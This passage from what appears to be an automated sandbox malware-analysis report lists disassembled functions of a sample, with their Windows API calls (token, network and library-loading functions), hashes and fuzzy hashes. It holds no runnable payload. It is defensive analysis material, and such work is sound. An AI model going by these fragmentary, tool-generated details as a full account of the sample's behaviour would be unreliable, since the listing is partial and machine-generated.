                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Thread$CreateErrorLastResume__dosmaperr
                        • String ID:
                        • API String ID: 173952441-0
                        • Opcode ID: a0e19dd01cd094da5b5815d18560a2a4c5a98fa0326efc3a4a272e4f35353d0c
                        • Instruction ID: 3dc192258b9da97fcf42498adef3a6c843b4fd56d38215207e64bd98d85ddcef
                        • Opcode Fuzzy Hash: a0e19dd01cd094da5b5815d18560a2a4c5a98fa0326efc3a4a272e4f35353d0c
                        • Instruction Fuzzy Hash: 6801C076846214BBCB216BA5DC09BAA7A6DDFC3730F104229FD36965D0DB708901C6E0
                        Function 0098600E Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON
                        Download Yara Rule
                        APIs
                        • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0098604C
                        • GetStockObject.GDI32(00000011), ref: 00986060
                        • SendMessageW.USER32(00000000,00000030,00000000), ref: 0098606A
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: CreateMessageObjectSendStockWindow
                        • String ID:
                        • API String ID: 3970641297-0
                        • Opcode ID: 445a86cec29187f79223c6c8af230cf554884e7560c71b496289fca1cdbcdfd0
                        • Instruction ID: d9565c9f7d8c06521cae3fffbba5f655c727fc8605a096836f330a70943a401a
                        • Opcode Fuzzy Hash: 445a86cec29187f79223c6c8af230cf554884e7560c71b496289fca1cdbcdfd0
                        • Instruction Fuzzy Hash: A011AD72501508BFEF129FA58C44FEABB6DFF083A4F004205FA1556210D7369C60DBA5
                        Function 009A3B3C Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • ___BuildCatchObject.LIBVCRUNTIME ref: 009A3B56
                          • Part of subcall function 009A3AA3: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 009A3AD2
                          • Part of subcall function 009A3AA3: ___AdjustPointer.LIBCMT ref: 009A3AED
                        • _UnwindNestedFrames.LIBCMT ref: 009A3B6B
                        • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 009A3B7C
                        • CallCatchBlock.LIBVCRUNTIME ref: 009A3BA4
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                        • String ID:
                        • API String ID: 737400349-0
                        • Opcode ID: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
                        • Instruction ID: 83401c591d6cd1615c461c3ea846b7023fd8ed85def1b664522ca59c3b3639a8
                        • Opcode Fuzzy Hash: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
                        • Instruction Fuzzy Hash: 52014C32100148BBDF125E95DC46EEB7F6EEF8A754F058014FE5866121C772E961DBE0
                        Function 009B3073 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,009813C6,00000000,00000000,?,009B301A,009813C6,00000000,00000000,00000000,?,009B328B,00000006,FlsSetValue), ref: 009B30A5
                        • GetLastError.KERNEL32(?,009B301A,009813C6,00000000,00000000,00000000,?,009B328B,00000006,FlsSetValue,00A22290,FlsSetValue,00000000,00000364,?,009B2E46), ref: 009B30B1
                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,009B301A,009813C6,00000000,00000000,00000000,?,009B328B,00000006,FlsSetValue,00A22290,FlsSetValue,00000000), ref: 009B30BF
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: LibraryLoad$ErrorLast
                        • String ID:
                        • API String ID: 3177248105-0
                        • Opcode ID: 7f68eb71cd43faea8e465bb00caec2c5efcbb30feb340f7d82249e9840001269
                        • Instruction ID: f2bd7504a90a18e6baa275261f1e205ce5fb4be3b19825c8ccb179ea3f92818b
                        • Opcode Fuzzy Hash: 7f68eb71cd43faea8e465bb00caec2c5efcbb30feb340f7d82249e9840001269
                        • Instruction Fuzzy Hash: 1001D436745232ABCB31EBB8AD449E77B9CAF05B71B208620F906E7140CB25D902C6E0
                        Function 009E7464 Relevance: 6.1, APIs: 4, Instructions: 51registryCOMMON
                        Download Yara Rule
                        APIs
                        • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000), ref: 009E747F
                        • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 009E7497
                        • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 009E74AC
                        • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 009E74CA
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Type$Register$FileLoadModuleNameUser
                        • String ID:
                        • API String ID: 1352324309-0
                        • Opcode ID: f0dbd0bd58102a959c37ceb0bdcb0a1c3eb09913ae12f5719ee0fb6424a779cb
                        • Instruction ID: e6c587123b29ebf0dece707a50046b34f721da004d5857b775ad93cfbcf09a48
                        • Opcode Fuzzy Hash: f0dbd0bd58102a959c37ceb0bdcb0a1c3eb09913ae12f5719ee0fb6424a779cb
                        • Instruction Fuzzy Hash: 5411E1B5249354ABE321CF95DC08F92BBFDEB00B10F108969A616D60A1E770ED04CB52
                        Function 009EB0A8 Relevance: 6.0, APIs: 4, Instructions: 50sleepCOMMON
                        Download Yara Rule
                        APIs
                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,009EACD3,?,00008000), ref: 009EB0C4
                        • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,009EACD3,?,00008000), ref: 009EB0E9
                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,009EACD3,?,00008000), ref: 009EB0F3
                        • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,009EACD3,?,00008000), ref: 009EB126
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: CounterPerformanceQuerySleep
                        • String ID:
                        • API String ID: 2875609808-0
                        • Opcode ID: 4069c744f4b7ea9d6db827852e4809ff181ea37914924f2bf7363d2ee017eb29
                        • Instruction ID: 2ab6c3a2af349ef04ae78fa24844665ff2b241cbe536016fcb3e434a0b33d5ea
                        • Opcode Fuzzy Hash: 4069c744f4b7ea9d6db827852e4809ff181ea37914924f2bf7363d2ee017eb29
                        • Instruction Fuzzy Hash: 47115730C4466CE7CF01EFE6E9A87EEBB78BB49321F008186D941B2185CB345A519B51
                        Function 009E2DA7 Relevance: 6.0, APIs: 4, Instructions: 34threadwindowtimeCOMMON
                        Download Yara Rule
                        APIs
                        • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 009E2DC5
                        • GetWindowThreadProcessId.USER32(?,00000000), ref: 009E2DD6
                        • GetCurrentThreadId.KERNEL32 ref: 009E2DDD
                        • AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 009E2DE4
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                        • String ID:
                        • API String ID: 2710830443-0
                        • Opcode ID: 3d3544057c0d118010534d014ea262ebe452405a2865d04da9e48136fde579d6
                        • Instruction ID: efeca758df7b0f505410aa451231c50a8ec2b907a0acb18beb20be9a5f1cf823
                        • Opcode Fuzzy Hash: 3d3544057c0d118010534d014ea262ebe452405a2865d04da9e48136fde579d6
                        • Instruction Fuzzy Hash: DEE06D715813347AD7215BA39C0DFEB7E6CEB42BB1F005115B205D1080DAA48982C6B0
                        Function 00A18863 Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00999639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00999693
                          • Part of subcall function 00999639: SelectObject.GDI32(?,00000000), ref: 009996A2
                          • Part of subcall function 00999639: BeginPath.GDI32(?), ref: 009996B9
                          • Part of subcall function 00999639: SelectObject.GDI32(?,00000000), ref: 009996E2
                        • MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 00A18887
                        • LineTo.GDI32(?,?,?), ref: 00A18894
                        • EndPath.GDI32(?), ref: 00A188A4
                        • StrokePath.GDI32(?), ref: 00A188B2
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                        • String ID:
                        • API String ID: 1539411459-0
                        • Opcode ID: 20a560528df2baade731a4c2a3238ff6a3aa3dca15e7873512b559543647226c
                        • Instruction ID: b34c254cb9d791bb2eb29e3c573daa5ea3149eba68fa801f20f5022930e69da9
                        • Opcode Fuzzy Hash: 20a560528df2baade731a4c2a3238ff6a3aa3dca15e7873512b559543647226c
                        • Instruction Fuzzy Hash: 7CF05E36081258FADB129FD4AC0AFDE3F59AF0A321F448100FA11650E1C7795552CFE9
                        Function 009998B0 Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                        Download Yara Rule
                        APIs
                        • GetSysColor.USER32(00000008), ref: 009998CC
                        • SetTextColor.GDI32(?,?), ref: 009998D6
                        • SetBkMode.GDI32(?,00000001), ref: 009998E9
                        • GetStockObject.GDI32(00000005), ref: 009998F1
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Color$ModeObjectStockText
                        • String ID:
                        • API String ID: 4037423528-0
                        • Opcode ID: 89a860aef4d5f1f7cf2be3d1c6a996146cf8b5e027442b2c26fd9cf215e0ef37
                        • Instruction ID: 070b52337383435bbe4da791ec9fecbe24974681176c3bf2fad8e94e7517e296
                        • Opcode Fuzzy Hash: 89a860aef4d5f1f7cf2be3d1c6a996146cf8b5e027442b2c26fd9cf215e0ef37
                        • Instruction Fuzzy Hash: F8E06D312C4280BADB219BB8BC09BE87F25AB12336F14C31AF6FA580E1C37146419B11
                        Function 009E162B Relevance: 6.0, APIs: 4, Instructions: 22threadCOMMON
                        Download Yara Rule
                        APIs
                        • GetCurrentThread.KERNEL32 ref: 009E1634
                        • OpenThreadToken.ADVAPI32(00000000,?,?,?,009E11D9), ref: 009E163B
                        • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,009E11D9), ref: 009E1648
                        • OpenProcessToken.ADVAPI32(00000000,?,?,?,009E11D9), ref: 009E164F
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: CurrentOpenProcessThreadToken
                        • String ID:
                        • API String ID: 3974789173-0
                        • Opcode ID: 3933404fa8f91ea20e862ae5653378ee7e27f3b911db4b21f9eb1bb0be7ca1b3
                        • Instruction ID: 082628541e0723183560936857929a56d71556176caa5b132fa6a76f9082c1f0
                        • Opcode Fuzzy Hash: 3933404fa8f91ea20e862ae5653378ee7e27f3b911db4b21f9eb1bb0be7ca1b3
                        • Instruction Fuzzy Hash: A9E08631641211DBD7205FE19D0DBC67B7CBF44BA1F14C808F245C9080D7348542C754
                        Function 009DD858 Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                        Download Yara Rule
                        APIs
                        • GetDesktopWindow.USER32 ref: 009DD858
                        • GetDC.USER32(00000000), ref: 009DD862
                        • GetDeviceCaps.GDI32(00000000,0000000C), ref: 009DD882
                        • ReleaseDC.USER32(?), ref: 009DD8A3
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: CapsDesktopDeviceReleaseWindow
                        • String ID:
                        • API String ID: 2889604237-0
                        • Opcode ID: ad12cdf9b4b680580f7027e22ce1dfb78ced26e2471791510006b199a63d0f92
                        • Instruction ID: 0d5fc620ee6435c35926b95f4f21ff62fecc13b1e99d66b714ad6fdf09dc78a0
                        • Opcode Fuzzy Hash: ad12cdf9b4b680580f7027e22ce1dfb78ced26e2471791510006b199a63d0f92
                        • Instruction Fuzzy Hash: BEE01AB4840204EFCF41EFE0D808AADBBB1FB08320F10E409E81AE7350C7384942AF50
                        Function 009DD86C Relevance: 6.0, APIs: 4, Instructions: 18COMMON
                        Download Yara Rule
                        APIs
                        • GetDesktopWindow.USER32 ref: 009DD86C
                        • GetDC.USER32(00000000), ref: 009DD876
                        • GetDeviceCaps.GDI32(00000000,0000000C), ref: 009DD882
                        • ReleaseDC.USER32(?), ref: 009DD8A3
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: CapsDesktopDeviceReleaseWindow
                        • String ID:
                        • API String ID: 2889604237-0
                        • Opcode ID: b33c3f10b15d541a4b5dfd371a1cf1c0afa221e61384364998960e3f2809ee20
                        • Instruction ID: 8153c61995d979f19ff3f8f798cb50c1ac2fda86cb94dd29fd55b4cd57a4a7a4
                        • Opcode Fuzzy Hash: b33c3f10b15d541a4b5dfd371a1cf1c0afa221e61384364998960e3f2809ee20
                        • Instruction Fuzzy Hash: 38E092B5C40204EFCF51EFE4D848AADBBB5BB48321B14A449E95AE7250CB385A42AF54
                        Function 009F4D87 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 230shareCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00987620: _wcslen.LIBCMT ref: 00987625
                        • WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 009F4ED4
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Connection_wcslen
                        • String ID: *$LPT
                        • API String ID: 1725874428-3443410124
                        • Opcode ID: 5c7939fa65a5ebe7e0637184267ecba86205d9ca0849776f19995404bd67c64e
                        • Instruction ID: f267be5593a9a6c2f48aba80da57fe4908af97222d61508fb9f7c96d7fce3b46
                        • Opcode Fuzzy Hash: 5c7939fa65a5ebe7e0637184267ecba86205d9ca0849776f19995404bd67c64e
                        • Instruction Fuzzy Hash: F3918075A002089FCB14DF58C484EBABBF5BF49314F198099E90A9F3A2D735ED85CB91
                        Function 009AE27D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON
                        Download Yara Rule
                        APIs
                        • __startOneArgErrorHandling.LIBCMT ref: 009AE30D
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: ErrorHandling__start
                        • String ID: pow
                        • API String ID: 3213639722-2276729525
                        • Opcode ID: 96bd70ad50a6fcf5e8a5e251302699c03d505fa3befbb8c2a2216ca6840685d2
                        • Instruction ID: 5c3161566742ce42b4ea67c3da362d22cbe78cd02c4e1c343cbad575c08c27a5
                        • Opcode Fuzzy Hash: 96bd70ad50a6fcf5e8a5e251302699c03d505fa3befbb8c2a2216ca6840685d2
                        • Instruction Fuzzy Hash: EE512F6190C10296CB15B798CB413F97B9CEFC17A0F344E68E4D5422F9EF358C969AC6
                        Function 0099E187 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID:
                        • String ID: #
                        • API String ID: 0-1885708031
                        • Opcode ID: 4e2ff85ab929049ee204687db15c55cf0d5ff54bd701005b3e9bce5aaf916cc7
                        • Instruction ID: e31717b9267ecf4e4ab73110a5794e72d839c1abfbc1587cfdd846132a646993
                        • Opcode Fuzzy Hash: 4e2ff85ab929049ee204687db15c55cf0d5ff54bd701005b3e9bce5aaf916cc7
                        • Instruction Fuzzy Hash: 3C510275944246DFDF15EF68C481AFE7BA8EF65310F24805AE8A19F3D0D6349D42CBA0
                        Function 0099F291 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON
                        Download Yara Rule
                        APIs
                        • Sleep.KERNEL32(00000000), ref: 0099F2A2
                        • GlobalMemoryStatusEx.KERNEL32(?), ref: 0099F2BB
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: GlobalMemorySleepStatus
                        • String ID: @
                        • API String ID: 2783356886-2766056989
                        • Opcode ID: ce42e705e01dbf48a89a18c51042b866c78afb771cfb0ae07eaf1f616424170a
                        • Instruction ID: 854c7a7a6e503ade888036f241e6d409946d5fd47a6adf92bd8f6dba2f41dd8d
                        • Opcode Fuzzy Hash: ce42e705e01dbf48a89a18c51042b866c78afb771cfb0ae07eaf1f616424170a
                        • Instruction Fuzzy Hash: 755135714087449BE320EF50EC86BABBBF8FFC5304F91885DF29951295EB3085298B66
                        Function 00A05745 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 125COMMON
                        Download Yara Rule
                        APIs
                        • CharUpperBuffW.USER32(?,?,?,00000003,?,?), ref: 00A057E0
                        • _wcslen.LIBCMT ref: 00A057EC
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: BuffCharUpper_wcslen
                        • String ID: CALLARGARRAY
                        • API String ID: 157775604-1150593374
                        • Opcode ID: bfa9e8ec6dd4292dee82800265494d59fba1ad1b56c6150c1b1bf997296662ce
                        • Instruction ID: 34f4c9b2e2bd63e2ca29f47bec80877b191187afe47e8c271094cb495f37b877
                        • Opcode Fuzzy Hash: bfa9e8ec6dd4292dee82800265494d59fba1ad1b56c6150c1b1bf997296662ce
                        • Instruction Fuzzy Hash: 6B419F31E002099FCB04DFB9D8819BEBBB5EF99320F148069E905A7291E7309D85DF90
                        Function 009FD0F4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98networkCOMMON
                        Download Yara Rule
                        APIs
                        • _wcslen.LIBCMT ref: 009FD130
                        • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 009FD13A
                        Strings
                        Memory Dump Source
